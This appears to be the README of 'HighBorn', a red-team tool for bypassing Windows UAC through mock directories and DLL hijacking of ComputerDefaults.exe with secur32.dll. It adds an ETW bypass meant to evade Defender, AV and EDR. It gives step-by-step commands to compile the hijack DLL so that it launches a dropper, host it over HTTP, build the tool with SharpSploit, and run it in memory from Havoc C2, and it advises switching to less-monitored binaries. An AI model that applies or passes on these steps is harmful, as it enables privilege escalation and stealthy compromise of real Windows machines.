Windows UAC Bypass utilizing mock directories and DLL Hijacking. This is a tool that I created to use with the "dotnet inline-execution" command on Havoc C2, but it can be used with any C2 that has in-memory execution. SharpSploit's ETW Bypass has been added to evade Defender/AV/EDR. This was just a quick and dirty POC.
Usage:
Open the highborn.c file in a text editor on your Kali box.
Replace the file path with the file path of the executable that you want to open (ie your dropper).
Compile HighBorn.c into a dll.
linux command: "x86_64-w64-mingw32-gcc -shared -o secur32.dll HighBorn.c -lcomctl32 -Wl,--subsystem,windows"
Host the dll on your Kali box.
command: python3 -m http.server PORT
Compiling HighBorn On Visual Studio
git clone https://github.com/cobbr/SharpSploit.git
Compile SharpSploit by changing the build to Release and then click Build.
Open the HighBorn sln file. Right click on "Add Reference" and then click "Browse."
Go to your SharpSploit compiled folder and in "Release" click on the SharpSploit.dll file to add it to HighBorn.
Now compile HighBorn by changing the build tab to Release.
Compiling HighBorn Withoug ETW Bypass On Linux
Remove the SharpSploit references in the HighBorn.cs file.
apt install mono-complete -y mcs -out:HighBorn.exe Highborn.cs
Execute on C2
command: dotnet inline-execute HighBorn.exe
Replace the ComputerDefaults.exe and secur32.dll with other EXEs and DLLs as you find DLLs that can be hijacked. ComputerDefaults is a popular one so it is probably monitored pretty closely.
Still need help? I've documented the whole process here: https://assume-breach.medium.com/home-grown-red-team-uac-bypass-on-windows-defender-for-endpoint-with-highborn-e9ea16546029